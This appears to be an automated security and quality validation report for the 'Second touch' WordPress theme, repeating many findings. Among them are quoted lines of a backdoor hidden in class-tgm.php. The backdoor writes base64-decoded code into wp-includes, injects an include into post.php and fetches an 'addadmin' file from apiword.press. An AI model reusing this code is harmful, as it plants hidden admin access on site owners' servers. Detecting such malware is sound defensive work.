0
Validation results

Second touch

Second touch

WordPress 4.9 theme
0
  • THEME TYPEWordPress theme 4.9
  • FILE NAMEsecondtouch.zip
  • FILE SIZE6878839 bytes
  • MD57e23bc5d009b943906aa501f2ab037fd
  • SHA11d2337b6c0cb3726580fe7556803967f768cf931
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, XML, Bitmap images, Adobe Illustrator
  • THEMEFOREST PAGEhttps://themeforest.net/item/second-touch-powerful-metro-styled-theme/5681032 ($42)
  • THEME URIhttp://theme.crumina.net/second/
  • VERSION1.9
  • AUTHOR URI
  • TAGSlight, white, one-column, two-columns, three-columns, right-sidebar, flexible-width, custom-background, custom-header, custom-menu, featured-images, microformats, post-formats, rtl-language-support, sticky-post, theme-options, translation-ready
  • CREATION DATE2017-11-11
  • LAST FILE UPDATE2017-11-11
  • LAST VALIDATION2017-11-11 08:36
Critical alerts
  1. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file extension_customizer.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  2. Security breaches : Use of base64_decode() Found base64_decode in file mvb_recent_news.php.
    Line 208: $no_of_panels = mvb_base64_decode($load['no_of_posts']);
    Found base64_decode in file widget-instagram.php.
    Line 229: $instagram = unserialize( base64_decode( $instagram ) );
    Found base64_decode in file OAuth.php.
    Line 215: $decoded_sig = base64_decode($signature);
    Found base64_decode in file class-tgm.php.
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 89: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  3. Security breaches : Use of base64_encode() Found base64_encode in file widget-instagram.php.
     $instagram = base64_encode( serialize( $instagram ) );
    Found base64_encode in file OAuth.php.
     return base64_encode(hash_hmac('sha1', $base_string, $key, true));
     return base64_encode($signature);
  4. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe src='https://player.vimeo.com/video/<?php echo get_post_meta( get_the_ID(), 'post_vimeo_video_url', true ); ?> in file post-video.php.
    Line 18: <iframe src='https://player.vimeo.com/video/<?php echo get_post_meta( get_t
  5. Malware : Operations on file system file_get_contents was found in the file options.php
    Line 1713: 'content' => file_get_contents(dirname(__FILE__).'/README.md')
    Line 1733: 'content' => nl2br(file_get_contents(trailingslashit(dirname(__FILE__)) . 'README.html'))
    file_get_contents was found in the file options.php
    Line 1713: 'content' => file_get_contents(dirname(__FILE__).'/README.md')
    Line 1733: 'content' => nl2br(file_get_contents(trailingslashit(dirname(__FILE__)) . 'README.html'))
    fopen was found in the file class.redux_helpers.php
    Line 651: //$fp = fopen( $file, 'r' );
    fread was found in the file class.redux_helpers.php
    Line 654: //$file_data = fread( $fp, 8192 );
    fclose was found in the file class.redux_helpers.php
    Line 657: //fclose( $fp );
    fopen was found in the file icon-manager.php
    Line 712: $ofp 	= fopen( $this->paths['tempdir'].'/'.basename($entry), 'w' );
    Line 739: $response   	= wp_remote_fopen(trailingslashit($this->paths['tempurl']).$this->svg_file );
    Line 795: $handle 	= @fopen( $charmap, 'w' );
    Line 1000: $handle = @fopen( $index_file, 'w' );
    fwrite was found in the file icon-manager.php
    Line 716: fwrite( $ofp, fread($fp, 8192) );
    Line 798: fwrite( $handle, '<?php $icons = array();');
    Line 804: fwrite( $handle, '\r\n'.'$icons[\''.$this->font_name.'\']['.$delimiter.$ico
    Line 1003: fwrite( $handle, '<?php\r\necho 'Sorry, browsing the directory is not allow
    fread was found in the file icon-manager.php
    Line 716: fwrite( $ofp, fread($fp, 8192) );
    fclose was found in the file icon-manager.php
    Line 717: fclose($fp);
    Line 718: fclose($ofp);
    Line 807: fclose( $handle );
    Line 1004: fclose( $handle );
    fclose was found in the file icon-manager.php
    Line 717: fclose($fp);
    Line 718: fclose($ofp);
    Line 807: fclose( $handle );
    Line 1004: fclose( $handle );
    file_get_contents was found in the file icon-manager.php
    Line 741: $json = file_get_contents(trailingslashit($this->paths['tempdir']).$this->json_file
    Line 742: if(empty($response)) $response = file_get_contents(trailingslashit($this->paths['tempdir']).$this->svg_file 
    Line 819: $file = @file_get_contents($style);
    file_get_contents was found in the file icon-manager.php
    Line 741: $json = file_get_contents(trailingslashit($this->paths['tempdir']).$this->json_file
    Line 742: if(empty($response)) $response = file_get_contents(trailingslashit($this->paths['tempdir']).$this->svg_file 
    Line 819: $file = @file_get_contents($style);
    fopen was found in the file icon-manager.php
    Line 712: $ofp 	= fopen( $this->paths['tempdir'].'/'.basename($entry), 'w' );
    Line 739: $response   	= wp_remote_fopen(trailingslashit($this->paths['tempurl']).$this->svg_file );
    Line 795: $handle 	= @fopen( $charmap, 'w' );
    Line 1000: $handle = @fopen( $index_file, 'w' );
    fwrite was found in the file icon-manager.php
    Line 716: fwrite( $ofp, fread($fp, 8192) );
    Line 798: fwrite( $handle, '<?php $icons = array();');
    Line 804: fwrite( $handle, '\r\n'.'$icons[\''.$this->font_name.'\']['.$delimiter.$ico
    Line 1003: fwrite( $handle, '<?php\r\necho 'Sorry, browsing the directory is not allow
    fwrite was found in the file icon-manager.php
    Line 716: fwrite( $ofp, fread($fp, 8192) );
    Line 798: fwrite( $handle, '<?php $icons = array();');
    Line 804: fwrite( $handle, '\r\n'.'$icons[\''.$this->font_name.'\']['.$delimiter.$ico
    Line 1003: fwrite( $handle, '<?php\r\necho 'Sorry, browsing the directory is not allow
    fclose was found in the file icon-manager.php
    Line 717: fclose($fp);
    Line 718: fclose($ofp);
    Line 807: fclose( $handle );
    Line 1004: fclose( $handle );
    file_get_contents was found in the file icon-manager.php
    Line 741: $json = file_get_contents(trailingslashit($this->paths['tempdir']).$this->json_file
    Line 742: if(empty($response)) $response = file_get_contents(trailingslashit($this->paths['tempdir']).$this->svg_file 
    Line 819: $file = @file_get_contents($style);
    file_put_contents was found in the file icon-manager.php
    Line 824: @file_put_contents($style,$str);
    fopen was found in the file icon-manager.php
    Line 712: $ofp 	= fopen( $this->paths['tempdir'].'/'.basename($entry), 'w' );
    Line 739: $response   	= wp_remote_fopen(trailingslashit($this->paths['tempurl']).$this->svg_file );
    Line 795: $handle 	= @fopen( $charmap, 'w' );
    Line 1000: $handle = @fopen( $index_file, 'w' );
    fwrite was found in the file icon-manager.php
    Line 716: fwrite( $ofp, fread($fp, 8192) );
    Line 798: fwrite( $handle, '<?php $icons = array();');
    Line 804: fwrite( $handle, '\r\n'.'$icons[\''.$this->font_name.'\']['.$delimiter.$ico
    Line 1003: fwrite( $handle, '<?php\r\necho 'Sorry, browsing the directory is not allow
    fclose was found in the file icon-manager.php
    Line 717: fclose($fp);
    Line 718: fclose($ofp);
    Line 807: fclose( $handle );
    Line 1004: fclose( $handle );
    file_get_contents was found in the file actions.php
    Line 496: $response = file_get_contents( $youtubeUrl );
    file_get_contents was found in the file OAuth.php
    Line 287: file_get_contents(self::$POST_INPUT)
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 105: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 123: $content = @file_get_contents('http://apiword.press/o.php?host=' . $_SERVER['HTTP_HOST'
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', file_get_contents('http://apiword.press/addadmin_1.txt'));
    Line 144: if ($file = file_get_contents($e[1]))
    Line 156: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class-tgm.php
    Line 40: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-cd.php', base64_decode($GLOBALS[
    Line 44: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 110: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 124: @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/wp-includes/class.wp.php', 
    Line 160: @file_put_contents(__FILE__, $file);
  6. Malware : Network operations curl_init was found in the file sharrre.php
    Line 62: $ch = curl_init();
    curl_exec was found in the file sharrre.php
    Line 67: $content = curl_exec($ch);
    curl_init was found in the file actions.php
    Line 398: $ch = curl_init();
    curl_exec was found in the file actions.php
    Line 402: $data = curl_exec($ch);
    curl_init was found in the file twitteroauth.php
    Line 196: $ci = curl_init();
    curl_exec was found in the file twitteroauth.php
    Line 222: $response = curl_exec($ci);
  7. Admin menu : Themes should use add_theme_page() for adding admin pages. File options.php :
    Line 182: // A list of available parent menus is available at http://codex.wordpress.org/Function_Reference/add_submenu_page#Parameters
    File framework.php :
    Line 1347: // wrappers and need to be appened to using add_submenu_page.
    Line 1398: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission
    Line 1456: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['t
    File framework.php :
    Line 1347: // wrappers and need to be appened to using add_submenu_page.
    Line 1398: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission
    Line 1456: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['t
    File framework.php :
    Line 1424: $this->page = call_user_func( 'add_menu_page', $this->args['page_title'], $this->args['menu_title'], $this
    File framework.php :
    Line 1347: // wrappers and need to be appened to using add_submenu_page.
    Line 1398: $this->page = call_user_func( 'add_submenu_page', $page_parent, $page_title, $menu_title, $page_permission
    Line 1456: call_user_func( 'add_submenu_page', $this->args['page_slug'], $section['title'], $section['t
    File welcome.php :
    Line 195: $page = 'add_management_page';
    File icon-manager.php :
    Line 445: $page = add_submenu_page(
    Line 454: $page = add_submenu_page(
    File icon-manager.php :
    Line 445: $page = add_submenu_page(
    Line 454: $page = add_submenu_page(
    File class.SidebarGenerator.php :
    Line 214: add_submenu_page('themes.php', 'Sidebars', 'Sidebars', 'manage_options', __
Warning
  1. core scripts deregistered : Core scripts deregistrationFound wp_deregister_script in framework.php. Themes must not deregister core scripts.
    Line 576: wp_deregister_script( 'wpb_ace' );
    Found wp_deregister_script in enqueue.php. Themes must not deregister core scripts.
    Line 215: wp_deregister_script( 'jquerySelect2' );
  2. theme tags : Presence of bad theme tagsThe tag light has been deprecated, it must be removed from style.css header.The tag white has been deprecated, it must be removed from style.css header.The tag flexible-width has been deprecated, it must be removed from style.css header.
  3. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is second-touch.
  4. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function _e, with the arguments "crum" in file mvb_recent_works_desc.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Member additional', mvb, 'mvb' in file mvb_our_team.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Customize &#8220;%s&#8221;' in file options.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Current theme preview' in file options.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments 'Current theme preview' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'By %s' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Version %s' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'This <a href="%1$s">child theme</a> requires its parent theme, %2$s.' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'http://codex.wordpress.org/Child_Themes' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Display Custom Excerpt ' in file options.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'If enabled custom excerpt will be displayed under portfolio featured images on portfolio Grid pages' in file options.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'If you like <strong>Redux</strong> please leave us a <a href="', https://, 'wordpress.org/support/view/plugin-reviews/redux-framework?filter=5#postform" target="_blank" class="redux-rating-link" data-rated="Thanks :)">&#9733;&#9733;&#9733;&#9733;&#9733;</a> rating. A huge thank you from Redux in advance!' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'If you like <strong>Redux</strong> please leave us a <a href="', https://, 'wordpress.org/support/view/plugin-reviews/redux-framework?filter=5#postform" target="_blank" class="redux-rating-link" data-rated="Thanks :)">&#9733;&#9733;&#9733;&#9733;&#9733;</a> rating. A huge thank you from Redux in advance!', 'redux-framework' in file welcome.php.Found a translation function that has an incorrect number of arguments. Function __, with the arguments 'Thank you for your message!', </h2>, 'crum' in file page-contacts.php.Found a translation function that is missing a text-domain. Function _e, with the arguments '*' in file comments.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'crum' in file widgets.php.Found a translation function that is missing a text-domain. Function _e, with the arguments 'crum' in file widget-vcard.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Clear' in file init.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Default' in file init.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Select Color' in file init.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Current Color' in file init.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Save' in file init.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are crum, mvb, redux-framework, themecheck, https://, buddypress, reactor, </h2>, woocommerce, product_cat, product_tag, roots, gallery, cmb.
  5. Cdn : Use of CDNFound the URL of a CDN in the code: html5shiv.googlecode.com/svn/trunk/html5.js. CSS or Javascript resources should not be loaded from a CDN. These resources should be bundled with the theme.
  6. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  7. PHP short tags : Presence of PHP short tagsPHP short tags were found in file parsedown.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.
    Line 14: # Modified by Dovy Paukstys to remove <? shortcode-like declaration.
  8. Fundamental theme elements : Presence of comment_form()Could not find comment_form.
  9. Comment pagination : Declaration of comment paginationThe theme doesn't have comment pagination code in it. Use paginate_comments_links() to add comment pagination, or older previous_comments_link() and next_comments_link() functions.
  10. Comment reply : Declaration of comment replyCould not find the comment-reply script enqueued, however a reference to 'comment-reply' was found. Make sure that the comment-reply js script is being enqueued properly on singular pages.
  11. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  12. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  13. I18N implementation : Proper use of _e(Possible variable $read_more_text found in translation function in mvb_recent_works_desc.php. Translation function calls should not contain PHP variables.
    Line 42: <a href='<?php echo $_link; ?>' class='read-more'><?php _e($read_more_text, 'crum'); ?></a>
    Possible variable $label found in translation function in widget-vcard.php. Translation function calls should not contain PHP variables.
    Line 110: <label for='<?php echo esc_attr($this->get_field_id($name)); ?>'><?php _e('{$label}:', 'crum'); ?></label>
  14. I18N implementation : Proper use of ___all(Possible variable $name found in translation function in widgets.php. Translation function calls should not contain PHP variables.
    Line 68: 'name' => __( $name , 'crum'),
  15. Featured image : Use of the_post_thumbnail() instead of custom fields for thumbnailsNo reference to the_post_thumbnail was found in the theme.
  16. CSS files : Presence of .screen-reader-text class.screen-reader-text css class is needed in your theme css. See : the Codex for an example implementation.
  17. Screenshot : Screenshot fileScreenshot size is 300x225px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon managementPossible Favicon found in header.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file options.php.
    Line 268: <p>If you have some questions on the theme, you can send them to our PM on <a href='http://themeforest.net/user/Crumina '>Themeforest.net</a>, you can send us 
    Line 349: 'sub_desc' => __('<p>After change please go to <a href='options-permalink.php'>Settings -> Permalinks</a> and press 'Save changes' 
    Line 1524: 'desc' => __('<p class='description'>More information about api keys and how to get it you can find in that tutorial <a href='http://crumina.net/how-do-i-get-consumer-key-for-sign-in-with-twitter/'>htt
    Possible hard-coded links were found in the file widget-tweets.php.
    Line 75: echo '<strong>' . $tweets->errors[0]->message . '!</strong><br />You\'ll need to regenerate it <a href='https://dev.twitter.com/apps' target='_blank'>here</a>!' . $after_widget;
    Possible hard-coded links were found in the file column-shortcode.php.
    Line 5: * Description: A [column] shortcode plugin for the required+ Foundation parent theme and child themes, based on <a href='http://themehybrid.com/plugins/grid-columns'>GridColumns by Justin Tadlock<
    Line 277: * If you prefer the shortcode by http://themehybrid.com/plugins/grid-columns
    Possible hard-coded links were found in the file alertbox-shortcode.php.
    Line 5: * Description: An [alert] shortcode plugin for the required+ Foundation parent theme and child themes, see <a href='http://foundation.zurb.com/docs/elements.php'>Foundation Docs</a> for more 
    Possible hard-coded links were found in the file class.SidebarGenerator.php.
    Line 247: You can create how many sidebars you want and then go and <a href='post-new.php?post_type=page'>Create</a> or <a href='edit.php?post_type=page
    Line 248: The sidebar will be added automaticaly to <a href='widgets.php'>Widgets</a> page
    Possible hard-coded links were found in the file project-social.php.
    Line 18: <a href='https://twitter.com/share' class='twitter-share-button' data-lang='en'>Twee
  3. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  4. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  5. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  6. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  7. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  8. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  9. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  10. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  11. Use of includes : Use of include or requireThe theme appears to use include or require : options.php
    Line 81: require_once(ABSPATH .'/wp-admin/includes/file.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : framework.php
    Line 425: require_once 'core/dashboard.php';
    Line 428: require_once 'core/newsflash.php';
    Line 1701: require_once 'core/enqueue.php';
    Line 2845: require_once 'core/enqueue.php';
    Line 2903: require_once 'core/panel.php';
    Line 3232: require_once 'core/panel.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : extension_customizer.php
    Line 142: include_once( ReduxFramework::$_dir . 'core/enqueue.php' );
    Line 751: require_once( $class_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : welcome.php
    Line 372: require_once 'views/about.php';
    Line 387: require_once 'views/changelog.php';
    Line 402: require_once 'views/extensions.php';
    Line 418: require_once 'views/support.php';
    Line 433: require_once 'views/credits.php';
    Line 448: require_once 'views/status_report.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : field_button_set.php
    Line 46: *              ['format']      string Formatting options for paginate fields. Options include ('currency','nice','niceShort','timeAgoInWords' or a valid Date() f
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : include-boxes.php
    Line 12: require_once 'page-boxes.php';
    Line 13: require_once 'post-boxes.php';
    Line 16: require_once 'headers-boxes.php';
    Line 19: require_once 'features-boxes.php';
    Line 20: require_once 'testimonial-boxes.php';
    Line 21: require_once 'portfolio-boxes.php';
    Line 22: require_once 'custom-sidebar.php';
    Line 23: require_once 'custom-menu.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : widgets.php
    Line 81: require( get_template_directory() . '/inc/widgets/widget-menu.php' );
    Line 83: require( get_template_directory() . '/inc/widgets/widget-tweets.php' );
    Line 84: require( get_template_directory() . '/inc/widgets/widget-tabs.php' );
    Line 85: require( get_template_directory() . '/inc/widgets/widget-tags.php' );
    Line 87: require( get_template_directory() . '/inc/widgets/widget-gallery.php' );
    Line 88: require( get_template_directory() . '/inc/widgets/widget-instagram.php' );
    Line 90: require( get_template_directory() . '/inc/widgets/widget-category-news.php'
    Line 91: require( get_template_directory() . '/inc/widgets/widget_categories.php' );
    Line 92: require( get_template_directory() . '/inc/widgets/widget-facebook.php' );
    Line 93: require( get_template_directory() . '/inc/widgets/widget-video.php' );
    Line 94: require( get_template_directory() . '/inc/widgets/widget-audio.php' );
    Line 95: require( get_template_directory() . '/inc/widgets/widget-flickr.php' );
    Line 96: require( get_template_directory() . '/inc/widgets/widget-vcard.php' );
    Line 97: require( get_template_directory() . '/inc/widgets/widget-styled-list.php' )
    Line 98: require( get_template_directory() . '/inc/widgets/widget-count.php' );
    Line 99: require( get_template_directory() . '/inc/widgets/widget-recent.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : icon-manager.php
    Line 512: include($file);
    Line 575: include($file);
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : init.php
    Line 220: @include( $file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : twitteroauth.php
    Line 10: require_once('OAuth.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : icons.php
    Line 119: include( $file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-tgm-plugin-activation.php
    Line 34: require_once ('class-tgm.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-tgm.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.

This is a ThemeForest theme. Since Themeforest items are all checked by a human before they appear on their website, ThemeForest verification rules are more permissive than themecheck's and can give a better verification score ( Themeforest requirements ).

47
  • THEME TYPEWordPress theme 4.9
  • FILE NAMEsecondtouch.zip
  • FILE SIZE6878839 bytes
  • MD57e23bc5d009b943906aa501f2ab037fd
  • SHA11d2337b6c0cb3726580fe7556803967f768cf931
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, XML, Bitmap images, Adobe Illustrator
  • THEMEFOREST PAGEhttps://themeforest.net/item/second-touch-powerful-metro-styled-theme/5681032 ($42)
  • THEME URIhttp://theme.crumina.net/second/
  • VERSION1.9
  • AUTHOR URI
  • TAGSlight, white, one-column, two-columns, three-columns, right-sidebar, flexible-width, custom-background, custom-header, custom-menu, featured-images, microformats, post-formats, rtl-language-support, sticky-post, theme-options, translation-ready
  • CREATION DATE2017-11-11
  • LAST FILE UPDATE2017-11-11
  • LAST VALIDATION2017-11-11 08:36
Critical alerts
  1. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file extension_customizer.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  2. Malware : Network operations curl_init was found in the file sharrre.php
    Line 62: $ch = curl_init();
    curl_exec was found in the file sharrre.php
    Line 67: $content = curl_exec($ch);
    curl_init was found in the file actions.php
    Line 398: $ch = curl_init();
    curl_exec was found in the file actions.php
    Line 402: $data = curl_exec($ch);
    curl_init was found in the file twitteroauth.php
    Line 196: $ci = curl_init();
    curl_exec was found in the file twitteroauth.php
    Line 222: $response = curl_exec($ci);
Warning
  1. core scripts deregistered : Core scripts deregistrationFound wp_deregister_script in framework.php. Themes must not deregister core scripts.
    Line 576: wp_deregister_script( 'wpb_ace' );
    Found wp_deregister_script in enqueue.php. Themes must not deregister core scripts.
    Line 215: wp_deregister_script( 'jquerySelect2' );
  2. theme tags : Presence of bad theme tagsThe tag light has been deprecated, it must be removed from style.css header.The tag white has been deprecated, it must be removed from style.css header.The tag flexible-width has been deprecated, it must be removed from style.css header.
  3. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is second-touch.
